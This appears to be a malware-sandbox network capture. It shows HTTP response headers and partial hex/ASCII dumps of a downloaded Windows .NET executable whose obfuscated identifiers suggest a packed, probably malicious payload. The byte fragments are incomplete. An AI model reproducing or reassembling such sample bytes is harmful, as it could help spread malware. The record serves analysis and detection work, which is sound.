                                                                                        x-goog-generation: 1659849170365462
                                                                                        x-goog-hash: crc32c=NYw5/Q==
                                                                                        x-goog-hash: md5=eSQqQDjjXyI00zc/uRM8Ow==
                                                                                        x-goog-metageneration: 1
                                                                                        x-goog-storage-class: STANDARD
                                                                                        x-goog-stored-content-encoding: identity
                                                                                        x-goog-stored-content-length: 59904
                                                                                        X-GUploader-UploadID: ADPycdupy3j_iJTl9UiBtH5H_LUJWnS6fjM0m76xxXqjYgQUCBDR1OD6agA7taTw16tkQfa4JMZqj0cPImG4pQS7vaiveg
                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZhuRC%2FuuVZdafWjTM7ZAbV1KxJRAQnk4nC8Cm3KLBfCDuNdXcvVN6J1GXerUkUgOgD1o7%2FUT0FKNBWC37boqdUzB3KU1vMFdPUnowfRfGVttWQ6DO8tgngxJSrynwpDIdT49sg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        2022-08-08 15:18:10 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                        Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                        2022-08-08 15:18:10 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c2 48 ef 62 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 b8 00 00 00 30 00 00 00 00 00 00 8e d6 00 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELHb!0 @ @`
                                                                                        2022-08-08 15:18:10 UTC2INData Raw: 38 f8 01 00 00 38 f3 01 00 00 20 15 00 00 00 fe 0c 00 00 3f fc 00 00 00 20 15 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 74 08 00 00 20 11 00 00 00 fe 0c 00 00 3f 64 00 00 00 20 11 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 19 07 00 00 20 0f 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 34 06 00 00 38 8b 01 00 00 20 10 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 10 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 93 06 00 00 38 65 01 00 00 38 60 01 00 00 20 13 00 00 00 fe 0c 00 00 3f 3e 00 00 00 20 13 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 35 07 00 00 20 12 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 12 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 cd 06 00 00 38 19 01 00 00 38 14 01 00 00 20 14 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 14 00 00 00 fe 0c 00
                                                                                        Data Ascii: 88 ? =8t ?d =8 ? =848 ? =88e8` ?> =85 ? =888 ?
                                                                                        2022-08-08 15:18:10 UTC4INData Raw: 04 00 fe 0c 03 00 20 01 00 00 00 59 20 01 00 00 00 9c fe 0c 08 00 fe 0c 03 00 20 01 00 00 00 59 8f 05 00 00 01 e0 fe 0c 06 00 fe 0c 03 00 20 01 00 00 00 59 9a fe 0c 08 00 fe 0c 03 00 20 01 00 00 00 59 8f 05 00 00 01 e0 4a fe 0c 01 00 7e 03 00 00 04 fe 0c 0b 00 fe 0c 03 00 20 01 00 00 00 59 94 97 29 05 00 00 11 7e 03 00 00 04 fe 0c 0c 00 fe 0c 02 00 58 4a 97 29 06 00 00 11 55 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 c3 f7 ff ff fe 0c 08 00 fe 0c 03 00 20 02 00 00 00 59 8f 05 00 00 01 e0 4c fe 0c 08 00 fe 0c 03 00 20 01 00 00 00 59 8f 05 00 00 01 e0 4c fe 02 fe 0c 0c 00 fe 0c 02 00 58 4a fe 0c 0c 00 20 08 00 00 00 58 fe 0c 02 00 58 4a 59 5a fe 0c 0c 00 20 08 00 00 00 58 fe 0c 02 00 58 4a 58 fe 0c 0f 00 58 fe 0e 0c 00 fe 0c 03 00 20 02 00 00 00 59 fe 0e
                                                                                        Data Ascii: Y Y Y YJ~ Y)~XJ)U X8 YL YLXJ XXJYZ XXJXX Y
                                                                                        2022-08-08 15:18:10 UTC5INData Raw: 06 03 00 00 06 9b 7e 03 00 00 04 20 02 00 00 00 fe 06 04 00 00 06 9b 7e 03 00 00 04 20 03 00 00 00 fe 06 05 00 00 06 9b 7e 03 00 00 04 20 04 00 00 00 fe 06 06 00 00 06 9b 7e 03 00 00 04 20 05 00 00 00 fe 06 07 00 00 06 9b 7e 03 00 00 04 20 06 00 00 00 fe 06 08 00 00 06 9b 7e 03 00 00 04 20 07 00 00 00 fe 06 09 00 00 06 9b 2a 26 02 28 08 00 00 0a 00 00 2a 2a 00 02 28 0c 00 00 0a 00 00 2a aa 73 0e 00 00 0a 80 04 00 00 04 73 0f 00 00 0a 80 05 00 00 04 73 10 00 00 0a 80 06 00 00 04 73 11 00 00 0a 80 07 00 00 04 00 2a 13 30 01 00 10 00 00 00 0a 00 00 11 00 7e 04 00 00 04 6f 12 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 0b 00 00 11 00 7e 05 00 00 04 6f 13 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 0c 00 00 11 00 7e 06 00 00 04 6f 14 00 00 0a 0a 2b 00
                                                                                        Data Ascii: ~ ~ ~ ~ ~ ~ *&(**(*ssss*0~o+*0~o+*0~o+
                                                                                        2022-08-08 15:18:10 UTC6INData Raw: 2b 0d 07 6f 3a 00 00 0a 6f 3b 00 00 0a 13 04 09 14 fe 01 16 fe 01 13 10 11 10 39 25 01 00 00 02 2c 03 03 2d 03 16 2b 01 17 00 13 11 11 11 2c 58 02 8e b7 17 da 13 05 16 11 05 13 0e 13 08 2b 3e 02 11 08 9a 13 07 03 11 08 9a 13 06 11 04 11 07 6f 3c 00 00 0a 13 11 11 11 2c 1b 09 11 06 28 3d 00 00 0a 13 10 11 10 2c 07 07 6f 3e 00 00 0a 00 00 14 0b 00 2b 12 00 00 11 08 17 d6 13 08 11 08 11 0e 13 12 11 12 31 b8 00 07 14 fe 01 16 fe 01 13 11 11 11 39 aa 00 00 00 04 14 fe 01 16 fe 01 13 10 11 10 2c 7f 04 6f 3f 00 00 0a 17 da 13 09 16 11 09 13 0f 13 0d 2b 62 04 11 0d 6f 40 00 00 0a 13 0a 11 0a 6f 3a 00 00 0a 6f 3b 00 00 0a 13 0c 11 0a 6f 06 00 00 2b 13 0b 11 0b 14 fe 01 16 fe 01 13 11 11 11 2c 2b 11 04 11 0c 6f 3c 00 00 0a 13 10 11 10 2c 1b 09 11 0b 28 3d 00 00 0a
                                                                                        Data Ascii: +o:o;9%,-+,X+>o<,(=,o>+19,o?+bo@o:o;o+,+o<,(=
                                                                                        2022-08-08 15:18:10 UTC8INData Raw: 11 2f 28 31 00 00 06 13 04 18 8d 08 00 00 01 13 2f 11 2f 16 72 1a 08 00 70 a2 00 11 2f 17 72 15 0a 00 70 a2 00 11 2f 28 31 00 00 06 13 14 18 8d 08 00 00 01 13 2f 11 2f 16 72 ba 0a 00 70 a2 00 11 2f 17 72 61 0d 00 70 a2 00 11 2f 28 31 00 00 06 13 08 18 8d 08 00 00 01 13 2f 11 2f 16 72 06 0e 00 70 a2 00 11 2f 17 72 53 11 00 70 a2 00 11 2f 28 31 00 00 06 13 0a 18 8d 08 00 00 01 13 2f 11 2f 16 72 f8 11 00 70 a2 00 11 2f 17 72 a3 14 00 70 a2 00 11 2f 28 31 00 00 06 13 0b 18 8d 08 00 00 01 13 2f 11 2f 16 72 48 15 00 70 a2 00 11 2f 17 72 9f 18 00 70 a2 00 11 2f 28 31 00 00 06 13 0c 18 8d 08 00 00 01 13 2f 11 2f 16 72 44 19 00 70 a2 00 11 2f 17 72 9b 1c 00 70 a2 00 11 2f 28 31 00 00 06 13 0d 18 8d 08 00 00 01 13 2f 11 2f 16 72 40 1d 00 70 a2 00 11 2f 17 72 ed 1f
                                                                                        Data Ascii: /(1//rp/rp/(1//rp/rap/(1//rp/rSp/(1//rp/rp/(1//rHp/rp/(1//rDp/rp/(1//r@p/r
                                                                                        2022-08-08 15:18:10 UTC9INData Raw: 13 32 11 32 2c 06 73 5e 00 00 0a 7a 00 11 06 12 01 7b 10 00 00 04 6f 5e 00 00 06 15 fe 01 13 32 11 32 2c 06 73 5e 00 00 0a 7a 00 de 40 25 28 61 00 00 0a 13 2d 00 12 01 7b 11 00 00 04 84 28 62 00 00 0a 13 2e 11 2e 14 fe 01 16 fe 01 13 32 11 32 2c 08 11 2e 6f 63 00 00 0a 00 00 16 13 07 28 64 00 00 0a de 0d 28 64 00 00 0a de 00 00 17 13 07 2b 00 11 07 2a 41 1c 00 00 00 00 00 00 5e 02 00 00 45 03 00 00 a3 05 00 00 40 00 00 00 09 00 00 01 13 30 03 00 25 00 00 00 23 00 00 11 00 02 28 13 00 00 2b 0c 02 28 14 00 00 2b 0a 08 06 7e 67 00 00 0a 6f 68 00 00 0a 28 69 00 00 0a 0b 2b 00 07 2a 00 00 00 13 30 04 00 11 00 00 00 0e 00 00 11 00 02 03 04 17 28 30 00 00 06 26 17 0a 2b 00 06 2a 00 00 00 13 30 02 00 3b 00 00 00 24 00 00 11 00 7e 1c 00 00 04 14 28 6a 00 00 0a 0c
                                                                                        Data Ascii: 22,s^z{o^22,s^z@%(a-{(b..22,.oc(d(d+*A^E@0%#(+(+~goh(i+*0(0&+*0;$~(j
                                                                                        2022-08-08 15:18:10 UTC10INData Raw: 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0a 0a 00 00 00 01 23 e0 a6 83 83 a6 e0 23 01 23 e0 a6 e1 e1 a6 e0 23 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0b 0b 00 00 00 01 44 f4 63 61 61 63 f4 44 01 44 f4 63 0d 0d 63 f4 44 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0c 0c 00 00 00 01 3b 76 fc f1 f1 fc 76 3b 01 3b 76 fc 88 88 fc 76 3b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0d 0d 00 00 00 01 7e 32 10 97 97 10 32 7e 01 7e 32 10 b7 b7 10 32 7e 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 0e 0e 00 00 00 01 62 ab d2 14 14 d2 ab 62 01 62 ab d2 63 63 d2 ab 62 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00
                                                                                        Data Ascii: ####DcaacDDccD;vv;;vv;~22~~22~bbbccb
                                                                                        2022-08-08 15:18:10 UTC12INData Raw: 26 00 00 00 01 72 76 bb 70 70 bb 76 72 01 72 76 bb 02 02 bb 76 72 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 27 27 00 00 00 01 55 ac 1d 45 45 1d ac 55 01 55 ac 1d 36 36 1d ac 55 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 28 28 00 00 00 01 71 fa 59 45 45 59 fa 71 01 71 fa 59 2c 2c 59 fa 71 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 29 29 00 00 00 01 08 5f 25 11 11 25 5f 08 01 08 5f 25 7e 7e 25 5f 08 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 2a 2a 00 00 00 01 03 c6 8f d4 d4 8f c6 03 01 03 c6 8f ba ba 8f c6 03 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 2b 2b 00 00 00 01 38 ca 33 09 09 33 ca 38 01 38
                                                                                        Data Ascii: &rvppvrrvvr''UEEUU66U((qYEEYqqY,,Yq))_%%__%~~%_**++83388
                                                                                        2022-08-08 15:18:10 UTC13INData Raw: 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 43 43 00 00 00 01 53 1f 2d f2 f2 2d 1f 53 01 53 1f 2d 93 93 2d 1f 53 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 44 44 00 00 00 01 20 bf 80 05 05 80 bf 20 01 20 bf 80 7c 7c 80 bf 20 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 45 45 00 00 00 01 02 83 a0 91 91 a0 83 02 01 02 83 a0 e2 e2 a0 83 02 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 46 46 00 00 00 01 00 23 d5 db db d5 23 00 01 00 23 d5 fb fb d5 23 00 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 47 47 00 00 00 01 32 6e 0d 17 17 0d 6e 32 01 32 6e 0d 76 76 0d 6e 32 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00
                                                                                        Data Ascii: CCS--SS--SDD || EEFF####GG2nn22nvvn2
                                                                                        2022-08-08 15:18:10 UTC14INData Raw: 00 00 01 5b a6 9c 50 50 9c a6 5b 01 5b a6 9c 70 70 9c a6 5b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 60 60 00 00 00 01 05 6b 97 c3 c3 97 6b 05 01 05 6b 97 ab ab 97 6b 05 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 61 61 00 00 00 01 1f 01 62 87 87 62 01 1f 01 1f 01 62 f3 f3 62 01 1f 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 62 62 00 00 00 01 1b d6 66 06 06 66 d6 1b 01 1b d6 66 72 72 66 d6 1b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 63 63 00 00 00 01 22 2a 7a 8a 8a 7a 2a 22 01 22 2a 7a fa fa 7a 2a 22 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 64 64 00 00 00 01 3f 18 b1 96 96 b1 18 3f 01 3f 18 b1
                                                                                        Data Ascii: [PP[[pp[``kkkkaabbbbbbfffrrfcc"*zz*""*zz*"dd???
                                                                                        2022-08-08 15:18:10 UTC16INData Raw: 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7c 7c 00 00 00 01 46 24 a0 0d 0d a0 24 46 01 46 24 a0 23 23 a0 24 46 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7d 7d 00 00 00 01 14 42 91 60 60 91 42 14 01 14 42 91 08 08 91 42 14 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7e 7e 00 00 00 01 0f 29 86 71 71 86 29 0f 01 0f 29 86 05 05 86 29 0f 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 7f 7f 00 00 00 01 36 ce c7 32 32 c7 ce 36 01 36 ce c7 5f 5f c7 ce 36 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 80 80 00 00 00 01 27 33 bb 08 08 bb 33 27 01 27 33 bb 64 64 bb 33 27 06 15 16 00 00 00 05 05 00 00 00 17 00 00 00 06 06 00 00 00
                                                                                        Data Ascii: ||F$$FF$##$F}}B``BBB~~)qq)))62266__6'33''3dd3'
                                                                                        2022-08-08 15:18:10 UTC17INData Raw: 01 77 3a 83 96 96 83 3a 77 01 77 3a 83 f9 f9 83 3a 77 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 15 15 00 00 00 01 07 0d b1 74 74 b1 0d 07 01 07 0d b1 00 00 b1 0d 07 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 16 16 00 00 00 01 7b 43 ce 6d 6d ce 43 7b 01 7b 43 ce 08 08 ce 43 7b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 17 17 00 00 00 01 1d aa 8e cc cc 8e aa 1d 01 1d aa 8e af af 8e aa 1d 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 18 18 00 00 00 01 18 ac 10 61 61 10 ac 18 01 18 ac 10 15 15 10 ac 18 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 19 19 00 00 00 01 4a 2f 0a 96 96 0a 2f 4a 01 4a 2f 0a f3 f3
                                                                                        Data Ascii: w::ww::wtt{CmmC{{CC{aaJ//JJ/
                                                                                        2022-08-08 15:18:10 UTC18INData Raw: 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 31 31 00 00 00 01 32 4f 28 aa aa 28 4f 32 01 32 4f 28 c7 c7 28 4f 32 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 32 32 00 00 00 01 13 6d 96 e4 e4 96 6d 13 01 13 6d 96 a0 a0 96 6d 13 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 33 33 00 00 00 01 3c ab de ba ba de ab 3c 01 3c ab de d5 d5 de ab 3c 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 34 34 00 00 00 01 45 4d 54 d6 d6 54 4d 45 01 45 4d 54 a2 a2 54 4d 45 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 35 35 00 00 00 01 25 16 9c a5 a5 9c 16 25 01 25 16 9c 85 85 9c 16 25 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01
                                                                                        Data Ascii: 112O((O22O((O222mmmm33<<<<44EMTTMEEMTTME55%%%%
                                                                                        2022-08-08 15:18:10 UTC20INData Raw: b2 63 8a 8a 63 b2 65 01 65 b2 63 ff ff 63 b2 65 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 4e 4e 00 00 00 01 4b 2b cb ea ea cb 2b 4b 01 4b 2b cb 93 93 cb 2b 4b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 4f 4f 00 00 00 01 16 9d 9a 2e 2e 9a 9d 16 01 16 9d 9a 0e 0e 9a 9d 16 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 50 50 00 00 00 01 09 a8 9b 11 11 9b a8 09 01 09 a8 9b 77 77 9b a8 09 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 51 51 00 00 00 01 26 25 c2 42 42 c2 25 26 01 26 25 c2 37 37 c2 25 26 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 52 52 00 00 00 01 63 12 23 67 67 23 12 63 01 63 12 23 0b 0b 23 12
                                                                                        Data Ascii: cceecceNNK++KK++KOO..PPwwQQ&%BB%&&%77%&RRc#gg#cc##
                                                                                        2022-08-08 15:18:10 UTC21INData Raw: 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6a 6a 00 00 00 01 09 a8 84 c6 c6 84 a8 09 01 09 a8 84 b1 b1 84 a8 09 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6b 6b 00 00 00 01 50 9e 93 66 66 93 9e 50 01 50 9e 93 48 48 93 9e 50 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6c 6c 00 00 00 01 66 0c e7 09 09 e7 0c 66 01 66 0c e7 68 68 e7 0c 66 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6d 6d 00 00 00 01 62 b3 c7 2b 2b c7 b3 62 01 62 b3 c7 59 59 c7 b3 62 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6e 6e 00 00 00 01 4c 57 57 48 48 57 57 4c 01 4c 57 57 25 25 57 57 4c 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00
                                                                                        Data Ascii: jjkkPffPPHHPllfffhhfmmb++bbYYbnnLWWHHWWLLWW%%WWL
                                                                                        2022-08-08 15:18:10 UTC22INData Raw: 06 00 64 00 6d 0b 06 00 7b 00 6d 0b 12 00 c9 11 4b 0f 06 00 41 0d 6d 0b 06 00 5d 0a 6d 0b 06 00 aa 0c 6d 0b 06 00 bf 12 6d 0b 06 00 38 0f 6d 0b 0a 00 3a 06 9a 0f 06 00 58 07 4b 0f 12 00 89 07 f5 0a 12 00 ca 06 f5 0a 12 00 41 07 12 0e 0a 00 a6 0e 5e 0f 06 00 41 08 4b 0f 0a 00 54 0e 9a 0f 12 00 13 07 df 0b 0a 00 e5 07 59 03 0a 00 cd 07 e3 0f 06 00 91 11 0a 10 06 00 a7 05 6d 0b 06 00 9f 04 6d 0b 06 00 21 0f 6d 0b 0a 00 89 08 59 03 0a 00 0f 00 cb 0a 06 00 a2 07 c4 0f 0e 00 b6 12 25 0d 06 00 39 00 3e 03 06 00 01 00 3e 03 06 00 07 0f 7e 11 06 00 86 04 6d 0b 0e 00 df 06 25 0d 0e 00 ec 04 25 0d 0e 00 fd 03 25 0d 0e 00 0f 12 25 0d 06 00 7a 04 7e 11 06 00 47 00 3e 03 06 00 6a 00 6d 0b 16 00 7b 04 35 0d 06 00 59 08 0a 10 06 00 ea 06 0a 10 12 00 de 04 4b 0f 12 00 92
                                                                                        Data Ascii: dm{mKAm]mmm8m:XKA^AKTYmm!mY%9>>~m%%%%z~G>jm{5YK
                                                                                        2022-08-08 15:18:10 UTC24INData Raw: 08 28 04 02 01 04 00 2c 30 00 00 00 00 06 18 2b 0f 8a 00 04 00 de 2f 00 00 00 00 01 18 2b 0f 8a 00 04 00 44 30 00 00 00 00 16 08 76 09 a9 02 04 00 a4 30 00 00 00 00 16 08 80 09 c0 02 05 00 04 31 00 00 00 00 16 08 8a 09 dc 02 07 00 6c 31 00 00 00 00 16 08 9d 09 f2 02 09 00 cc 31 00 00 00 00 16 08 8a 09 01 03 0c 00 ea 31 00 00 00 00 16 08 9d 09 0a 03 0e 00 f8 31 00 00 00 00 16 00 fd 07 1b 03 11 00 24 32 00 00 00 00 16 00 28 07 33 03 13 00 4c 32 00 00 00 00 16 00 cd 10 49 03 15 00 ac 32 00 00 00 00 16 00 cd 10 bb 03 19 00 20 33 00 00 00 00 16 00 cd 10 2c 04 1d 00 c4 34 00 00 00 00 03 18 2b 0f 77 04 21 00 e4 34 00 00 00 00 03 00 af 12 8e 04 24 00 10 35 00 00 00 00 03 00 17 12 9c 04 25 00 54 35 00 00 00 00 11 18 31 0f 73 00 26 00 be 35 00 00 00 00 06 18 2b 0f
                                                                                        Data Ascii: (,0+/+D0v01l1111$2(3L2I2 3,4+w!4$5%T51s&5+
                                                                                        2022-08-08 15:18:10 UTC25INData Raw: 74 0a 00 00 02 00 e4 03 00 00 03 00 90 0a 00 00 01 00 25 12 00 00 02 00 e8 03 00 00 01 00 19 03 00 00 02 00 b2 0a 00 00 03 00 9e 06 00 00 01 00 9b 12 00 00 01 00 19 03 00 00 01 00 25 12 00 00 02 00 e8 03 00 00 01 00 55 05 00 00 02 00 73 05 00 00 03 00 e7 10 00 00 04 00 bc 10 00 00 05 00 a1 10 00 00 06 00 21 11 00 00 07 00 cb 12 00 00 08 00 b3 13 00 00 09 00 dc 0c 00 00 0a 00 1a 0c 00 00 0b 00 b2 0a 00 00 0c 00 9e 06 00 00 01 00 dc 0c 00 00 02 00 1a 0c 00 00 03 00 9b 12 00 00 01 00 55 05 00 00 02 00 73 05 00 00 03 00 e7 10 00 00 04 00 bc 10 00 00 05 00 a1 10 00 00 06 00 21 11 00 00 07 00 cb 12 00 00 08 00 b3 13 00 00 09 00 dc 0c 00 00 0a 00 1a 0c 00 00 01 00 25 12 00 00 02 00 e8 03 00 00 01 00 cc 03 00 00 02 00 65 13 00 00 03 00 b2 0a 00 00 04 00 9e 06 00
                                                                                        Data Ascii: t%%Us!Us!%e
                                                                                        2022-08-08 15:18:10 UTC26INData Raw: 05 41 00 01 12 ea 05 59 00 e8 0c f1 05 49 00 2b 0f 8a 00 b1 01 a9 13 f4 05 a1 01 06 11 01 06 c1 01 d2 0e 07 06 31 00 96 03 0d 06 31 00 2a 0b 8a 00 c1 01 c0 0e 73 00 51 01 27 13 22 06 51 01 02 13 22 06 41 00 d8 13 a1 04 41 00 f5 03 33 06 c9 01 81 06 39 06 19 00 59 11 60 07 c1 00 9c 13 66 07 f1 01 2b 0f 6c 07 11 02 d7 03 e7 07 09 02 2b 0f 8a 00 19 02 2b 0f 85 00 21 02 2b 0f 85 00 29 02 2b 0f 85 00 31 02 2b 0f 85 00 39 02 2b 0f 85 00 41 02 2b 0f 85 00 49 02 2b 0f 85 00 51 02 2b 0f d3 08 61 02 2b 0f e3 08 69 02 2b 0f 8a 00 71 02 2b 0f 85 00 79 02 2b 0f 85 00 51 02 2b 0f 67 09 29 00 b3 00 2f 01 2e 00 7b 03 7a 02 2e 00 83 03 7a 02 2e 00 8b 03 71 08 2e 00 93 03 7a 02 2e 00 9b 03 91 08 2e 00 a3 03 71 08 2e 00 ab 03 bb 08 2e 00 b3 03 da 08 2e 00 2b 01 7a 02 2e 00
                                                                                        Data Ascii: AYI+11*sQ'"Q"AA39Y`f+l++!+)+1+9+A+I+Q+a+i+q+y+Q+g)/.{z.z.q.z..q...+z.
                                                                                        2022-08-08 15:18:10 UTC28INData Raw: 60 31 00 43 6f 6e 74 65 78 74 56 61 6c 75 65 60 31 00 54 68 72 65 61 64 53 61 66 65 4f 62 6a 65 63 74 50 72 6f 76 69 64 65 72 60 31 00 49 45 6e 75 6d 65 72 61 74 6f 72 60 31 00 4c 69 73 74 60 31 00 52 65 73 65 72 76 65 64 31 00 52 65 61 64 49 6e 74 33 32 00 54 6f 49 6e 74 33 32 00 46 75 6e 63 60 32 00 52 65 73 65 72 76 65 64 32 00 49 6e 74 36 34 00 54 6f 49 6e 74 31 36 00 3c 4d 6f 64 75 6c 65 3e 00 67 65 74 45 6e 63 6f 64 69 6e 67 43 4d 53 53 45 43 54 49 4f 4e 45 4e 54 52 59 49 44 4d 45 54 41 44 41 54 41 00 65 72 49 6c 4f 48 6d 54 6a 76 46 55 52 55 42 00 46 7a 52 58 72 4e 58 52 41 46 43 71 5a 51 44 00 73 44 47 57 6a 74 49 6e 6e 65 41 74 76 51 44 00 73 4c 45 58 52 67 6d 42 45 4f 62 4c 7a 6c 44 00 4e 58 6e 64 55 49 50 75 6f 47 50 47 47 42 46 00 68 6c 49 4b
                                                                                        Data Ascii: `1ContextValue`1ThreadSafeObjectProvider`1IEnumerator`1List`1Reserved1ReadInt32ToInt32Func`2Reserved2Int64ToInt16<Module>getEncodingCMSSECTIONENTRYIDMETADATAerIlOHmTjvFURUBFzRXrNXRAFCqZQDsDGWjtInneAtvQDsLEXRgmBEObLzlDNXndUIPuoGPGGBFhlIK
